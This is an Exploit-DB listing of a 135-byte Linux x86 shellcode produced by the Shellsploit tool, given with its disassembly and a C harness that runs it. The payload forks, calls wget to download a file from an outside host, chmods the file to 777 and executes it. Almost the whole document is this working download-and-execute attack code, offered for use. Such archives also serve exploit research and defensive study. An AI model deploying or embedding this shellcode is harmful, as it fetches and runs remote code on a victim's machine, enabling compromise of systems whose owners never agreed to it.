Linux/x86 - Download File + Execute Shellcode (135 bytes)

EDB-ID:

39389

CVE:

N/A


Author:

B3mB4m


Platform:

Linux_x86

Date:

2016-02-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

/*
--------------------------------------------------------------------------------------------------------

[+] Author  : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/Shellsploit
[~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu
[~] Poc     : http://imgur.com/hHB4yiQ


#We are still working on ROP Chain, stay tuned :)


"""
You can convert it an elf file:

https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/

If you want test:
    Important : your filename len must be one byte(Weird bug I'll fix it
soon lol).
    Default settings for http://b3mb4m.github.io/exec/h
    Source codes : b3mb4m.github.io/exec/hello.asm
"""



00000000  31C0              xor eax,eax
00000002  B002              mov al,0x2
00000004  CD80              int 0x80
00000006  31DB              xor ebx,ebx
00000008  39D8              cmp eax,ebx
0000000A  743B              jz 0x47
0000000C  31C9              xor ecx,ecx
0000000E  31DB              xor ebx,ebx
00000010  31C0              xor eax,eax
00000012  6A05              push byte +0x5
00000014  89E1              mov ecx,esp
00000016  89E1              mov ecx,esp
00000018  89E3              mov ebx,esp
0000001A  B0A2              mov al,0xa2
0000001C  CD80              int 0x80
0000001E  31C9              xor ecx,ecx
00000020  31C0              xor eax,eax
00000022  50                push eax
00000023  B00F              mov al,0xf
00000025  6A68              push byte +0x68
00000027  89E3              mov ebx,esp
00000029  31C9              xor ecx,ecx
0000002B  66B9FF01          mov cx,0x1ff
0000002F  CD80              int 0x80
00000031  31C0              xor eax,eax
00000033  50                push eax
00000034  6A68              push byte +0x68
00000036  89E3              mov ebx,esp
00000038  50                push eax
00000039  89E2              mov edx,esp
0000003B  53                push ebx
0000003C  89E1              mov ecx,esp
0000003E  B00B              mov al,0xb
00000040  CD80              int 0x80
00000042  31C0              xor eax,eax
00000044  40                inc eax
00000045  CD80              int 0x80
00000047  6A0B              push byte +0xb
00000049  58                pop eax
0000004A  99                cdq
0000004B  52                push edx
0000004C  6865632F68        push dword 0x682f6365
00000051  682F2F6578        push dword 0x78652f2f
00000056  68622E696F        push dword 0x6f692e62
0000005B  6869746875        push dword 0x75687469
00000060  68346D2E67        push dword 0x672e6d34
00000065  6862336D62        push dword 0x626d3362
0000006A  89E1              mov ecx,esp
0000006C  52                push edx
0000006D  6A74              push byte +0x74
0000006F  682F776765        push dword 0x6567772f
00000074  682F62696E        push dword 0x6e69622f
00000079  682F757372        push dword 0x7273752f
0000007E  89E3              mov ebx,esp
00000080  52                push edx
00000081  51                push ecx
00000082  53                push ebx
00000083  89E1              mov ecx,esp
00000085  CD80              int 0x80
*/

//Project : https://github.com/b3mb4m/Shellsploit
//This file created with shellsploit ..
//30/01/2016 - 02:59:21
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell

unsigned char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

int main(void){
    (*(void(*)()) shellcode)();
}